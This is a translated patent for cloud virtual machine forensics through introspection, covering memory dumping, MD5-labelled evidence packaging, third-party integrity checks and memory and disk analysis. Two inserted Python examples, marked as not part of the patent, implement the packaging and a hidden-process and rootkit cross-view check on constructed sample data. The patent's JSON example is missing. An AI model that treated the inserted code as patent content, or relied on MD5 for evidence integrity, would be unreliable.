Server forensics method based on virtual machine introspection
Technical field
The present invention relates to the field of information technology and, in particular, to a server forensics method based on virtual machine introspection.
Background technology
With the rapid development of cloud computing, the information industry has entered the "cloud era". In a network environment where intrusions and attacks are commonplace, how a cloud service provider can analyse and collect evidence about a tenant's system when that tenant is attacked, or notices an anomaly in its own system, has become a pressing problem in cloud computing security. Because of the nature of cloud computing, the underlying equipment is transparent to users, so the security of the cloud platform is the users' foremost concern. Cloud service users demand a high level of security: besides deploying security equipment to resist various attacks, the cloud service provider should also provide detailed forensic analysis results after a user's system has been intruded upon and damaged.
In a cloud computing platform, the virtualization of hardware resources is the foundation of the whole platform, and the platform places high demands on user privacy and isolation. Forensic analysis therefore faces some special requirements, mainly in the following aspects:
1. Diversity: cloud computing is applied ever more widely in critical industries and fields. Different industries and fields select different cloud service providers, and different providers may use different virtualization technologies on their underlying hardware. Users, in turn, configure virtual machines according to their own needs. Under these many possible combinations, the types of virtual machine that need to be examined are highly varied.
2. Accuracy: since a cloud platform must meet very strict privacy requirements when serving cloud users, the cloud provider is not entitled to inspect the specific information inside a user's virtual machine while the user is using the platform's resources. When collecting evidence from a user's virtual machine, the provider can therefore typically obtain only abstract data such as memory dump files. The abstractness of this data makes it harder to understand, and forensic analysis must bridge the gap between the abstract data and useful information.
3. Agility: a cloud service provider may offer computing or storage services to a very large number of users, and each user may purchase several virtual machine instances at once. A single user may thus generate many forensic analysis requests, and across the many users of different cloud platforms the scale of demand can become enormous. A forensic analysis system must therefore be able to perform virtual machine forensics quickly if it is to be useful in practice.
To meet the business need for virtual machine inspection in real virtualized environments, researchers and engineers worldwide have, over many years of research and exploration, developed many virtual machine inspection methods. These methods fall into two major classes: explicit information introspection and implicit information introspection.
① Explicit information introspection: such methods mainly rely on known internal data structures of the operating system and their storage locations to obtain the internal state of the target virtual machine; debug symbol information, such as the .map files of a Linux system, can also supply internal information about the target. However, closed-source operating systems, and differences between versions of the same operating system, make it harder to obtain internal data with a single method, so maintaining the programs is very laborious. Despite this difficulty, the accuracy and speed of the approach keep it in use. Livewire is a virtual-machine-based intrusion detection system that adds a library inside the virtual machine and uses kernel build information to locate and read the operating system's data structures; VMwatcher is also a virtual-machine-based intrusion detection system, but it starts a separate virtual machine on top of the virtual machine monitor to perform intrusion detection, using the isolation between virtual machines to reduce the risk of the detection system being tampered with; Lares deploys a dedicated library in the virtual machine monitor and implants hooks into the target virtual machine, and when a hook is triggered by a specific operation, the corresponding API in the monitor's library obtains information from inside the virtual machine. Although such introspection methods can obtain information from inside the virtual machine, they retain fatal weaknesses. On the one hand, the internal data structures of open-source or widely known operating systems allow malware to disguise its behaviour further, so the information obtained from the target virtual machine is inaccurate or incomplete and the forensic analysis cannot proceed; on the other hand, deploying hooks inside the target virtual machine breaks the isolation of the virtual machine and the user's privacy requirements, and writing different programs for different operating system versions increases the difficulty of forensic analysis.
② Implicit information introspection: such methods obtain information from known system structures, in particular by interacting with specific structures such as the registry, the I/O subsystem or the memory management unit. This information does not depend entirely on the operating system, so even if the system is compromised it is not easily tampered with. Because of the inherent limits of this approach, obtaining all the information of the operating system is difficult, there is sometimes a delay, and the information may even be wrong. A typical example is converting virtual addresses to physical addresses using the page tables in memory. Antfarm uses the CR3 register to track the true process information of the target virtual machine, then obtains the user-level view of the processes over a network connection to the target and cross-checks the two to detect hidden processes in the target. Although such introspection methods can obtain internal information from outside the virtual machine, they retain a defect that cannot be ignored: extracting useful operating-system-level information from a large amount of low-level data is no easy task.
Because a virtualized environment is isolated and private, forensic analysis must offer sufficient diversity, accuracy and agility, which places new and higher demands on the virtual machine forensics process. At the same time, it is clear from the two main approaches above that their intrinsic defects leave them difficult and insufficient when applied to forensics. Many practitioners in this field are therefore studying new methods of virtual machine forensics to solve the problem in cloud computing services. How to improve the efficiency and versatility of forensic analysis as much as possible while guaranteeing its accuracy is the focus of attention.
Invention content
The object of the present invention is to provide a server forensics method based on virtual machine introspection that, while guaranteeing the privacy of the cloud tenant, quickly analyses the internal information and state of a virtual machine when the tenant's virtual machine has been compromised, and thereby meets the cloud platform's requirements for accuracy and agility in the forensic analysis of tenant virtual machines.
To achieve this object, the present invention provides a server forensics method based on virtual machine introspection with the following steps:
S1. Obtain the state information of the target virtual machine, store the compressed state information file in a database and send it to a third party for forensic analysis;
S2. Perform forensic analysis on the target virtual machine state information file sent by the cloud computing provider;
S3. Produce the detection results as a standardised examination report and feed it back.
In a preferred embodiment, step S1 uses the privileged position and built-in functions of the virtual machine monitor to dump the memory of the target virtual machine into a memory dump (core dump) file, and at the same time obtains the file that serves as the target virtual machine's disk on the server. A memory dump here means that the virtual machine monitor saves all data in the memory of the specified virtual machine (both system data and user data) to a dump file for analysis by the relevant personnel. A memory dump provides a bit-level backup of the memory contents: the user's memory is saved in full, any information in memory can be fully backed up, and the dump reflects all state information at the last moment before the target virtual machine was frozen. The specific method is:
S1-1. Freeze the running state of the target virtual machine, dump its memory using the functions of the virtual machine monitor, and at the same time copy the virtual disk files belonging to the virtual machine;
S1-2. Store the memory dump file and the virtual disk files in the cloud service provider's database according to the corresponding rules;
S1-3. Verify the memory dump file and the virtual disk files, then package and compress them in the corresponding format and transmit them to the third-party testing agency, until the agency's acknowledgement of successful reception is received.
This is an out-of-the-box detection process that makes no modification inside the virtual machine. It takes a bit-level backup of the state of the client virtual machine at the moment it was frozen, which helps security engineers later reconstruct the target virtual machine's running state.
In a further preferred embodiment, step S1-1 specifically includes:
S1-1-1. When a cloud service user realises that its virtual machine is behaving abnormally, it requests the cloud service provider to examine the virtual machine; on receiving the request, the provider immediately freezes that user's virtual machine;
S1-1-2. The cloud service provider uses the virtual machine monitor to dump the memory of the target virtual machine into a memory dump file, then, according to the target virtual machine's configuration, locates and copies the virtual disk files belonging to it, thereby capturing the original evidence required for forensic analysis of the target. This capture follows immediately after the virtual machine is frozen, so it accurately reflects the true state of the target virtual machine.
In a further preferred embodiment, the specific method of step S1-2 is: the cloud service provider establishes a database and stores in it the ID of the cloud service user who requested the examination, the ID of the target virtual machine, the time at which the virtual machine was frozen and the compressed state information file of the target virtual machine.
In a further preferred embodiment, in step S1-3 the cloud service provider establishes a secure link with the third-party testing agency to transmit the compressed file. While step S1-2 is in progress, the provider sends the agency a request to establish a secure link; the third party, on receiving the request, returns a response confirming that a secure link can be established; on receiving this response, the provider establishes the secure link with the third party and uses it to transmit the compressed target virtual machine state information file from step S1-2. After the file has been transmitted, the third party computes the MD5 value of the received compressed file and compares it with the value in the compressed file's name; if they match, it decompresses the archive and verifies the two files inside, otherwise it does not decompress and asks the cloud service provider to transmit again. If the previous step succeeded, the decompressed files are compared once more with the information in the JSON file; if this comparison also succeeds, the provider is notified that the received file is complete and correct, otherwise the provider is again asked to retransmit until the file is delivered successfully.
In a further preferred embodiment, step S1-3 stores the compressed state information file of the target virtual machine generated in step S1-1 in the database and sends it to the third party for forensic analysis. Because the memory dump file and the virtual disk files of the target virtual machine are both very large, they must be compressed, which saves storage space and improves transmission efficiency. After compression, a unique label is generated from the cloud service user's ID, the virtual machine's ID and a timestamp (the hash value of the file computed with a hash algorithm is used as the label, which also facilitates the later integrity check) and associated with the compressed file. Once compression and labelling are complete, the files and the information are stored in the target virtual machine information set, i.e. the database that holds the compressed files and labels described above. After storage, a secure transmission link is established with the third-party testing agency and the compressed file is sent to the third party for forensic analysis.
In a still further preferred embodiment, the specific method of compression and labelling is:
(1) Create a folder and place the memory dump file and the virtual disk files in it;
(2) Create a JSON file and record the relevant information in it: first compute the MD5 hash values of the memory dump file and the virtual disk files separately and write them into the JSON file; also record in the JSON file the mail address at which the user will receive the examination report; the JSON file then takes the corresponding form; finally place the JSON file in the folder created in (1);
(3) Compress the folder with the 7z compression technique, compute the MD5 hash of the resulting compressed file after compression finishes, and use this hash as the compressed file's name.
In a further preferred embodiment, step S1-3 specifically includes:
S1-3-1. Obtain the memory dump file and the virtual disk files of the target virtual machine and place them in a folder created according to the user ID;
S1-3-2. Compute the MD5 hash values of the memory dump file and the virtual disk files separately, and obtain the mail address at which the user will receive the results;
S1-3-3. Create a JSON file storing the hash values computed in step S1-3-2 and place it in the folder created above;
S1-3-4. Compress the folder and compute the MD5 hash of the compressed file;
S1-3-5. Rename the compressed file using its MD5 hash;
S1-3-6. Back up the compressed file and build the target virtual machine state information file database; end.
In a still further preferred embodiment, the specific method of step S1-3-5 is: rename the compressed file to "user ID" + "-" + "the MD5 hash computed in step S1-3-4".
In a still further preferred embodiment, the specific method of step S1-3-6 is: the third-party forensic analysis agency establishes a database and backs up the compressed state information files of target virtual machines transmitted by the cloud service provider, together with the provider's information, the time of arrival and the hash of the compressed file.
In a preferred embodiment, step S2 decompresses and restores the transmitted compressed file, i.e. restores the associated files of the target virtual machine into their corresponding folder so as to recover the target virtual machine's state. After restoration, memory forensics and disk forensics are carried out separately. The forensic method analyses the target virtual machine's running state before it was frozen according to the data structure templates of the memory of the target's operating system, then reconstructs the target's behaviour before freezing from the data on the disk, in order to analyse its anomalies. The steps are:
S2-1. Perform memory forensics to obtain all the state information of the running virtual machine, such as all processes and all loaded kernel modules;
S2-2. Perform disk forensics to obtain all the external data of the running virtual machine, such as logs and the registry;
S2-3. Combine and analyse the two kinds of data to determine the security state of the target virtual machine and analyse its problems.
In a further preferred embodiment, step S2-1 specifically includes:
S2-1-1. Verify the memory dump file of the target virtual machine: compute the file's MD5 hash and compare it with the MD5 hash in the JSON file of the target virtual machine state information archive; if they match, proceed to step S2-1-2; if not, copy a fresh forensic copy from the agency's database until the two MD5 values match;
S2-1-2. Determine the operating system type corresponding to the memory dump file and write it into the variable OStype; use OStype to retrieve from the agency's database the memory structure template for that operating system and a memory forensics tool suited to the dump file's format;
S2-1-3. Using the memory structure template and the memory forensics tool, parse the information contained in the memory dump file, mainly process information, kernel information and network information. For process information, extract from the dump the list of active processes and of hidden or terminated processes, derive the process tree from the parent-child relationships, and list the dynamic link libraries each process uses; for kernel information, extract the loaded kernel modules and recently unloaded kernel modules and detect hidden kernel modules, kernel callbacks and so on; for network information, extract the basic network information such as interfaces, sockets, active connections and port numbers.
In a further preferred embodiment, the specific method of step S2-2 is: verify the virtual disk files of the target virtual machine by computing their MD5 hash and comparing it with the MD5 value in the JSON file of the state information archive; if they match, proceed to the next analysis step; if not, copy a fresh forensic copy from the agency's database until the MD5 values match. Determine the disk image format of the virtual disk files and write it into the variable IMGtype; use IMGtype to retrieve from the agency's database a disk forensics tool suited to that format. Using the disk's file format and the disk forensics tool, parse the information contained in the virtual disk files, mainly the user list, the file directory and log information, and export the parsed information into formatted files. For the file system, scan the disk with a virus and trojan detection tool to determine whether the target virtual machine is infected with a virus or implanted with a trojan, and at the same time analyse the target's network behaviour for anomalies. For log information, once a virus, trojan or anomalous network behaviour has been detected, the events caused by the malicious program can be reconstructed along a timeline.
Step S2-2 specifically includes:
S2-2-1. Transmit the target virtual machine state information file;
S2-2-2. Determine whether the MD5 hash of the compressed file matches its filename; if so, proceed to step S2-2-3, otherwise go directly to step S2-2-5;
S2-2-3. Decompress, and determine whether the MD5 hash of the memory dump file matches the information in the JSON file; if so, proceed to step S2-2-4, otherwise go directly to step S2-2-5;
S2-2-4. Determine whether the MD5 hash of the virtual disk files matches the information in the JSON file; if so, proceed to step S2-2-5, otherwise go directly to step S2-2-5;
S2-2-5. Determine whether retransmission is required; if so, return to step S2-2-2, otherwise end.
In a still further preferred embodiment, in step S2-2-1 the compressed state information file of the target virtual machine is transmitted to the third-party testing agency over the secure link.
In a still further preferred embodiment, in step S2-2-2 the third-party testing agency, after receiving the compressed file, verifies it using its filename.
In a still further preferred embodiment, in step S2-2-3 the two files in the folder after decompression are each verified using the information provided by the JSON file in the folder.
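The packaging procedure (steps S1-3-1 to S1-3-5) and the receiving-side checks (steps S2-2-2 to S2-2-4) implemented together, as an added example that is not part of the patent: it assumes the JSON file is named manifest.json, uses a ZIP archive as a stand-in for the 7z compression in the text, and runs on constructed stand-in files. It keeps the specified MD5 labelling but parameterises the hash so SHA-256 can be substituted, since MD5 is not collision resistant.

```python
"""Evidence packaging (S1-3-1 to S1-3-5) and third-party verification
(S2-2-2 to S2-2-4) of a target virtual machine's state information.

Assumptions not in the original: the JSON file is named manifest.json, the
archive is a ZIP (stand-in for 7z), and the dump/disk contents are constructed."""
import hashlib
import json
import shutil
import tempfile
import zipfile
from pathlib import Path

# The text specifies MD5. MD5 is not collision resistant, so whoever controls the
# evidence files could craft colliding inputs; the algorithm is parameterised so
# "sha256" can be substituted without any other change.
HASH_ALGO = "md5"


def file_hash(path, algo=HASH_ALGO):
    """Stream a (possibly multi-gigabyte) file through the hash in 1 MiB chunks."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def package_evidence(user_id, dump_path, disk_path, mail, out_dir):
    """Cloud-provider side. Returns the archive path, named '<user_id>-<hash>.zip'."""
    out_dir = Path(out_dir)
    folder = out_dir / user_id                       # S1-3-1: folder per user ID
    folder.mkdir(parents=True, exist_ok=True)
    dump_dst = folder / Path(dump_path).name
    disk_dst = folder / Path(disk_path).name
    shutil.copyfile(dump_path, dump_dst)
    shutil.copyfile(disk_path, disk_dst)
    manifest = {                                     # S1-3-2 / S1-3-3: hashes + mail
        "coredump": {"file": dump_dst.name, HASH_ALGO: file_hash(dump_dst)},
        "disk": {"file": disk_dst.name, HASH_ALGO: file_hash(disk_dst)},
        "mail": mail,
    }
    (folder / "manifest.json").write_text(json.dumps(manifest, indent=2))
    tmp = out_dir / f"{user_id}.tmp.zip"             # S1-3-4: compress the folder
    with zipfile.ZipFile(tmp, "w", zipfile.ZIP_DEFLATED) as z:
        for p in sorted(folder.iterdir()):
            z.write(p, arcname=f"{user_id}/{p.name}")
    final = out_dir / f"{user_id}-{file_hash(tmp)}.zip"  # S1-3-5: rename to ID-hash
    tmp.rename(final)
    return final


def verify_evidence(archive, extract_to):
    """Third-party side. Returns (ok, detail): the mail address on success, or
    the reason a retransmission is requested (S2-2-5) on failure."""
    archive = Path(archive)
    user_id, _, claimed = archive.stem.rpartition("-")
    if claimed != file_hash(archive):                # S2-2-2: archive hash vs. filename
        return False, "archive hash does not match filename"
    with zipfile.ZipFile(archive) as z:
        # Added hardening: reject member names that would escape extract_to.
        for name in z.namelist():
            if name.startswith("/") or ".." in Path(name).parts:
                return False, f"unsafe archive member {name!r}"
        z.extractall(extract_to)
    folder = Path(extract_to) / user_id
    manifest = json.loads((folder / "manifest.json").read_text())
    for key in ("coredump", "disk"):                 # S2-2-3 / S2-2-4: files vs. JSON
        entry = manifest[key]
        if file_hash(folder / entry["file"]) != entry[HASH_ALGO]:
            return False, f"{key} hash does not match manifest"
    return True, manifest["mail"]


def demo():
    """Round trip on constructed sample files, then a simulated corruption in transit."""
    with tempfile.TemporaryDirectory() as d:
        d = Path(d)
        dump = d / "vm-0042.dump"
        dump.write_bytes(b"constructed memory image " * 4096)
        disk = d / "vm-0042.qcow2"
        disk.write_bytes(b"constructed disk image " * 4096)
        archive = package_evidence("tenant-0001", dump, disk,
                                   "tenant@example.test", d / "out")
        ok, detail = verify_evidence(archive, d / "received")
        # Flip one byte of the archive: the filename check (S2-2-2) must now fail.
        data = bytearray(archive.read_bytes())
        data[len(data) // 2] ^= 0xFF
        archive.write_bytes(bytes(data))
        corrupt_ok, reason = verify_evidence(archive, d / "received2")
        return {"ok": ok, "mail": detail, "corrupt_ok": corrupt_ok, "reason": reason}


if __name__ == "__main__":
    print(demo())
```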
In a preferred embodiment, step S3, after the anomaly of the target virtual machine has been detected, lists the results of the memory forensics and the disk forensics in a standard format, generates the corresponding JSON file, returns the examination report to the cloud service provider and sends it to the user's mail address attached to the transmitted file. The specific method is: combine the results of memory forensics and disk forensics to determine the target virtual machine's problem, for example that a trojan has been implanted or the registry has been tampered with, and generate the forensic analysis result information from the evidence and the identified problems in a fixed format; extract features from the target virtual machine found to be abnormal to obtain the features produced by the particular malware, and write them into the agency's feature database; store the generated result report in the agency's database as a backup; find, in the transmitted target virtual machine state information file, the user's mail address for receiving results and send the forensic analysis report to that address; then return to the cloud service provider a notification that the forensic analysis of the target virtual machine succeeded; finally delete the forensic analysis report.
In a further preferred embodiment, step S3 specifically includes:
S3-1. Back up the forensically analysed compressed state information file of the target virtual machine into the database, then delete it;
S3-2. Perform memory forensics on the memory dump file;
S3-3. Perform disk forensics on the virtual disk files;
S3-4. Perform a comprehensive analysis of the results of steps S3-2 and S3-3 and generate the forensic analysis report;
S3-5. Send the forensic analysis report to the cloud service user at the mail address in the JSON file;
S3-6. Back up the forensic analysis report into the database, then delete it.
In a still further preferred embodiment, steps S3-1 and S3-4 are used to build the original data and forensic analysis result database.
The invention has the following advantages:
The present invention assists the fast and reliable forensic examination of virtual machines on servers in the virtualized environment of a cloud computing platform. When a cloud service user realises that its virtual machine is behaving abnormally, it notifies the cloud service provider and requests forensic analysis. On receiving the request, the provider immediately freezes the virtual machine, dumps its memory and packages the dump together with the virtual machine's disk files, establishes a one-to-one mapping between the original evidence and the user ID, performs an integrity check on the original material and then sends it to the third-party testing agency for forensic analysis. On receiving the original evidence, the third party performs an integrity check; if the material is intact it first preserves a copy for record, then performs standardised memory and disk forensics according to the designed algorithmic flow, recording the results and operation log of each forensic step. When the forensic analysis is complete, the report is sent back to the cloud provider, which passes the results to the cloud service user and, according to the user's wishes, retains or destroys the copy of the original evidence. Throughout the forensic process the cloud service provider does not take part in the analysis but only obtains the original evidence, and the third-party testing agency deals only with the cloud service provider, which protects the privacy of the cloud service user.
Compared with traditional virtual machine forensics methods, the main advantages of the present invention are as follows:
1. The present invention does not require the cloud service provider to deploy a forensic analysis module inside its platform. The only requirement placed on the provider is to obtain the associated files of the target virtual machine for which a user has requested forensic analysis and to perform a simple integrity check on them. This on-demand forensic analysis service allows the provider to meet users' forensic needs without deploying additional hardware or technical staff.
2. The present invention greatly improves the efficiency of forensic analysis of target virtual machines: the third-party agency has professional analysis tools and professional security engineers, which greatly improves the accuracy and speed of analysis, and the cost of file transmission can be reduced by laying a dedicated link, thereby meeting the requirements for accuracy and agility.
3. High reusability and extensibility. Since cloud service providers' forensic analysis needs for target virtual machines are similar, the forensic tools deployed at the third-party agency can serve multiple platforms, whereas separate deployment on each platform would produce a great deal of idle capacity and waste; at the same time, because the service is one-to-many, a newly deployed tool benefits all platforms, so the forensic tools are also easier to extend and deploy.
4. Complete backup data management. Databases deployed at the cloud service provider and the third-party testing agency manage the backup data centrally, so that it can be used during forensic detection and data recovery.
5. Privacy protection for clients with forensic needs. The cloud service provider only obtains the original evidence of the user's virtual machine and does not analyse it, while the third-party testing agency only analyses the transmitted original material and does not know the customer information of the target virtual machine; the provider and the agency associate the two using a unique key value.
6. Uniform report format. Users of different cloud service providers receive result reports in a uniform format, which helps a user compare the forensic services obtained from different platforms and further helps skilled recipients process the reports automatically.
In addition to the objects, features and advantages described above, the present invention has other objects, features and advantages. The present invention is described in further detail below with reference to the figures.
Description of the drawings
The accompanying drawings, which form part of this application, are provided to aid understanding of the present invention; the schematic embodiments of the invention and their description serve to explain the invention and do not constitute an improper limitation of it. In the drawings:
Fig. 1 is the general flow chart of the present invention;
Fig. 2 is the flow chart of labelling and compressing the state information of the target virtual machine (steps S1-3-1 to S1-3-6);
Fig. 3 is the flow chart of transmitting the compressed state information file of the target virtual machine (steps S2-2-1 to S2-2-5);
Fig. 4 is the flow chart of the forensic analysis of the target virtual machine (steps S3-1 to S3-6).
Specific implementation mode
Embodiments of the present invention are described in detail below with reference to the accompanying drawings, but the present invention may be implemented in many different ways as defined and covered by the claims.
Referring to Fig. 1 to Fig. 4, a server forensics method based on virtual machine introspection proceeds as follows:
S1. Obtain the state information of the target virtual machine, store the compressed state information file in a database and send it to a third party for forensic analysis;
S2. Perform forensic analysis on the target virtual machine state information file sent by the cloud computing provider;
S3. Produce the detection results as a standardised examination report and feed it back.
In step S1, the privileged position and built-in functions of the virtual machine monitor are used to perform a memory dump of the target virtual machine, producing a memory dump file, and at the same time the file that serves as the disk of the target virtual machine is obtained on the server. A memory dump here means that the virtual machine monitor saves all data in the memory of the specified virtual machine (both system data and user data) into a dump file for analysis by the relevant personnel. A memory dump provides a bit-level backup of the memory contents: the user's memory is saved in full, any information in memory can be completely backed up, and it reflects all status information of the target virtual machine at the last moment before it was frozen. The specific method is:
S1-1. freeze the operating state of the guest virtual machine, dump its memory using the functions of the virtual machine monitor, and at the same time copy the virtual disk file corresponding to the virtual machine;
S1-2. store the memory dump file and the virtual disk file in the database of the cloud service provider according to the corresponding rules;
S1-3. verify, package and compress the memory dump file and the virtual disk file according to the corresponding format and transmit them to the third-party testing agency, repeating until a successful-reception message is received from the third-party testing agency.
This is an out-of-the-box detection process: nothing is modified inside the virtual machine. It makes a bit-level backup of the state of the guest virtual machine at the moment it was frozen and helps the security engineer to subsequently recover the operating state of the target virtual machine.
Step S1-1 specifically comprises:
S1-1-1. when the cloud service user realizes that his virtual machine behaves abnormally, he submits to the cloud service provider a request to examine the virtual machine; on receiving the request, the cloud service provider immediately freezes that user's virtual machine;
S1-1-2. the cloud service provider uses the virtual machine monitor to dump the memory of the target virtual machine into a memory dump file; then, according to the configuration of the target virtual machine, it locates the virtual disk file belonging to that virtual machine and copies it, thereby capturing the original evidence material required for the forensic analysis of the target virtual machine. This capture immediately follows the freezing of the virtual machine, so it accurately reflects the true state of the target virtual machine.
The specific method of step S1-2 is: the cloud service provider establishes a file management database and stores in it the ID of the cloud service user who submitted the examination request, the ID of the target virtual machine, the time at which the virtual machine was frozen, and the compressed status information file of the target virtual machine.
In step S1-3 the cloud service provider establishes a secure link with the third-party testing agency over which the compressed file is transmitted. While step S1-2 is being carried out, the cloud service provider sends the third-party testing agency a request to establish a secure link; after the third party receives the request it returns a reply confirming that the secure link can be established; on receiving this reply the cloud service provider sets up the secure link with the third-party agency and uses it to transmit the compressed status information file of the target virtual machine from step S1-2. After the file has been transmitted, the third party computes the MD5 value of the received compressed file and compares it with the value carried in the file name; if they agree it decompresses the file and verifies the two files inside, otherwise it does not decompress and returns a retransmission request to the cloud service provider. After the previous step succeeds, the decompressed files are compared with the information in the JSON file; if they still agree, the third party informs the cloud service provider that the received file is complete and correct, otherwise it keeps returning retransmission requests to the cloud service provider until the file is successfully delivered.
In step S1-3 the compressed status information file of the target virtual machine produced in step S1-1 is stored in the database and sent to the third party for forensic analysis. Since the memory dump file and the virtual disk file of the target virtual machine are both very large, they must be compressed, which saves storage space and at the same time improves transmission efficiency. After compression, a unique label is generated from the ID of the cloud service user, the ID of the virtual machine and the timestamp (the hash value of the file computed with a hash algorithm is used as the label, which facilitates the subsequent integrity check) and is associated with the compressed file. After compression and labelling are complete, these files and this information are stored in the target virtual machine information set, which is the database that stores the above-mentioned compressed files and labels. A secure transmission link is established with the third-party testing agency, and after the compressed file has been stored in the database it is sent to the third party for forensic analysis.
The specific method of compression and labelling is:
(1) create a folder and put the memory dump file and the virtual disk file into the new folder;
(2) create a JSON file and record the relevant information in it: first compute the MD5 hash values of the memory dump file and of the virtual disk file separately and write these hash values into the JSON file; also write into the JSON file the e-mail address at which the user will receive the result report; the form of this JSON file at this point is
finally, put this JSON file into the folder created in (1);
(3) compress the folder with the 7z compression technique; when compression finishes, compute the MD5 hash value of the compressed file produced and use this hash value as the file name of the compressed file.
Step S1-3 specifically comprises:
S1-3-1. obtain the memory dump file and the virtual disk file of the target virtual machine and put them into a folder created according to the user ID;
S1-3-2. compute the MD5 hash values of the memory dump file and the virtual disk file separately, and obtain the e-mail address at which the user will receive the result;
S1-3-3. create a JSON file storing the hash values computed in step S1-3-2 and deposit it in the folder created;
S1-3-4. compress the folder obtained and compute the MD5 hash value of the compressed file;
S1-3-5. rename the compressed file using the MD5 hash value of the compressed file;
S1-3-6. back up the compressed file and build the target virtual machine status information file database; end.
The specific method of step S1-3-5 is: rename the compressed file to "user ID" + "-" + "MD5 hash value computed in step S1-3-4".
The specific method of step S1-3-6 is: the third-party forensic analysis agency establishes a file management database and backs up the compressed status information file about the target virtual machine transmitted by the cloud service provider, recording the information of the cloud service provider, the arrival time of the transmission and the hash value of the compressed file.
In step S2 the transmitted compressed file is decompressed and restored, i.e. the related files of the target virtual machine are restored into their corresponding folder, so that the state of the target virtual machine is recovered. After the files have been restored, memory forensic analysis and disk forensic analysis are carried out separately. The method of forensic analysis is to analyze the operating state of the target virtual machine before it was frozen according to the memory data structure template corresponding to the operating system of the target virtual machine, and then, according to the data on the disk, to reconstruct the behaviour of the target virtual machine before it was frozen, so as to analyze the anomalies of the target virtual machine. The steps are as follows:
S2-1. carry out memory forensic analysis to obtain all status information of the running virtual machine, such as all processes and all loaded kernel modules;
S2-2. carry out disk forensic analysis to obtain all external data of the running virtual machine, such as logs and the registry;
S2-3. analyze the two kinds of data in combination, detect the security state of the target virtual machine and analyze the problem with the target virtual machine.
Step S2-1 specifically comprises:
S2-1-1. verify the memory dump file of the target virtual machine: compute the MD5 hash value of the file and compare it with the MD5 hash value in the JSON file contained in the compressed status information file of the target virtual machine; if the two agree, go to step S2-1-2; if they do not agree, copy a fresh copy for forensic analysis from the database within the agency, until the two MD5 values agree;
S2-1-2. determine the operating system type corresponding to the memory dump file and write it into the variable OStype; use OStype to retrieve from the database within the agency the memory structure template corresponding to that operating system and the memory forensic analysis tool suited to the file format of the memory dump file;
S2-1-3. according to the memory structure template and using the memory forensic analysis tool, parse the information contained in the memory dump file, mainly process information, kernel information and network information. For process information, the active process list and the hidden or terminated processes are extracted from the memory dump file, and the process tree and the dynamic link libraries used by each process are derived from the parent-child relationships. For kernel information, the loaded kernel modules and the recently unloaded kernel modules are extracted from the memory dump file, and hidden kernel modules, kernel callbacks and the like are detected. For network information, basic network information such as interfaces, sockets, active connections and port numbers is extracted from the memory dump file.
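The detection of hidden and terminated processes described in step S2-1-3 is a cross-view comparison: structures recovered by scanning physical memory are compared with what the operating system's own process list reports. The following block is an added example, not the patent's own code. It assumes that a memory forensics tool has already parsed the dump into two such views (plus a module list, a module scan and the recovered connections) and shows how hidden processes, terminated processes, the process tree, hidden kernel modules and connections owned by hidden processes are derived from them. All records (process names, pids, module names, addresses) are constructed sample data.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str
    exit_time: Optional[str] = None  # set when the structure belongs to an exited process
    dlls: tuple = ()


# View 1: the OS's own active process list (constructed sample data).
LISTED = [
    Proc(4, 0, "System"),
    Proc(400, 4, "smss.exe"),
    Proc(600, 400, "winlogon.exe"),
    Proc(900, 600, "explorer.exe", dlls=("ntdll.dll", "kernel32.dll")),
    Proc(1200, 900, "notepad.exe", dlls=("ntdll.dll",)),
]
# View 2: every process structure found by scanning physical memory (constructed).
SCANNED = LISTED + [
    Proc(1337, 900, "svchost.exe", dlls=("ntdll.dll", "ws2_32.dll")),  # unlinked: hidden
    Proc(1500, 900, "cmd.exe", exit_time="2024-01-01T00:04:10Z"),      # exited, not yet freed
]
LOADED_MODULES = {"ntoskrnl.exe", "hal.dll", "ndis.sys", "tcpip.sys"}  # module list walk
SCANNED_MODULES = LOADED_MODULES | {"rootkit.sys"}                      # driver-object scan
CONNECTIONS = [  # (owner pid, local, remote), constructed sample data
    (900, "10.0.0.5:49200", "93.184.216.34:443"),
    (1337, "10.0.0.5:49201", "198.51.100.7:4444"),
]


def cross_view(listed, scanned):
    """A structure present in the scan but absent from the OS list is either hidden
    (no exit time) or terminated (exit time set). Returns (hidden, terminated)."""
    listed_pids = {p.pid for p in listed}
    unlisted = [p for p in scanned if p.pid not in listed_pids]
    hidden = [p for p in unlisted if p.exit_time is None]
    terminated = [p for p in unlisted if p.exit_time is not None]
    return hidden, terminated


def process_tree(procs):
    """Parent pid -> child pids, built from ppid; processes whose parent is not in
    the set (or already exited) are attached to the None root."""
    pids = {p.pid for p in procs}
    tree = {}
    for p in procs:
        parent = p.ppid if p.ppid in pids else None
        tree.setdefault(parent, []).append(p.pid)
    return tree


def hidden_modules(loaded, scanned):
    """Modules found by scanning but missing from the kernel's loaded-module list."""
    return sorted(scanned - loaded)


def suspicious_connections(connections, hidden_procs):
    """Connections whose owning process the OS list does not show."""
    hidden_pids = {p.pid for p in hidden_procs}
    return [c for c in connections if c[0] in hidden_pids]


def analyze(listed=LISTED, scanned=SCANNED, loaded=LOADED_MODULES,
            scanned_mods=SCANNED_MODULES, connections=CONNECTIONS):
    hidden, terminated = cross_view(listed, scanned)
    return {
        "hidden_processes": [(p.pid, p.name) for p in hidden],
        "terminated_processes": [(p.pid, p.name, p.exit_time) for p in terminated],
        "process_tree": process_tree(scanned),
        "hidden_modules": hidden_modules(loaded, scanned_mods),
        "suspicious_connections": suspicious_connections(connections, hidden),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(), indent=2, default=str))
```

The tree is built from the scanned view rather than the listed view so that a hidden process still appears under its real parent (here, a child of explorer.exe), which is usually the most telling fact about it.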
